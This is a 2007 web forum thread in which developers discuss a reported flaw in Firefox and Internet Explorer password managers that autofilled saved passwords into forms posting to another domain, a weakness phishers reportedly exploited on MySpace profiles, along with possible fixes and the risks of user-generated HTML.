Page 1 of 1
Potential Firefox password manager vulnerability
Posted: Wed Jan 31, 2007 5:16 pm
by RobertGonzalez
A colleague of mine just sent me this article. This is surprising and frightening at the same time.
http://www.info-svc.com/news/11-21-2006/
Apparently crafty phishers have found a way to tap into the 'Remember my Password for this' feature of Firefox (and from what I was reading, IE6 and IE7 as well) and auto-populate the password field of forms that post to a different domain. This requires some work on the hackers parts, but it works with scary efficiency.
PS
This is the Firefox Bugzilla entry for this know bug.
Posted: Wed Jan 31, 2007 5:36 pm
by superdezign
See, this is why I don't use the password remembrance feature.
Posted: Wed Jan 31, 2007 6:09 pm
by JellyFish
Yeah, but you'd still need to visit the myspace profile and submit your information.
EDIT:
Actually in the case of using firefox, you need to fill in the username before the password would auto-fill. You'd need myspace, for example, to auto-fill the username thus auto-filling the password. As well, you need to click submit and, before anything, visit the myspace profile.
EDIT 2: And from this example:
https://bugzilla.mozilla.org/attachment.cgi?id=245426 I get a warning from firefox explaining how this informations is to be send to an third-partied server. Atleast this is because I have the most recent version of firefox.
Posted: Thu Feb 01, 2007 1:21 am
by matthijs
There are 2 issues here. First the fact that FF (and IE apparently) fills in a password without checking the action of the form (going to another domain). That should be solved. In my opinion without a popup asking "Are you sure you want to ... ", as that doesn't work anyway and is irritating only.
But the other thing is that allowing users to use HTML and create forms on their pages is silly. Another reason why user-generated HTML is a bad idea.
Posted: Thu Feb 01, 2007 1:25 am
by superdezign
Web designers (and hackers) have to start somewhere :-p
But, I mean, FF and IE do give warnings about the feature and it's possible security glitches (at least FF did), so saving your password onto your computer is definitely a risk.
Posted: Thu Feb 01, 2007 2:50 am
by AKA Panama Jack
Whispers...
Opera...
Leaves the room quietly...
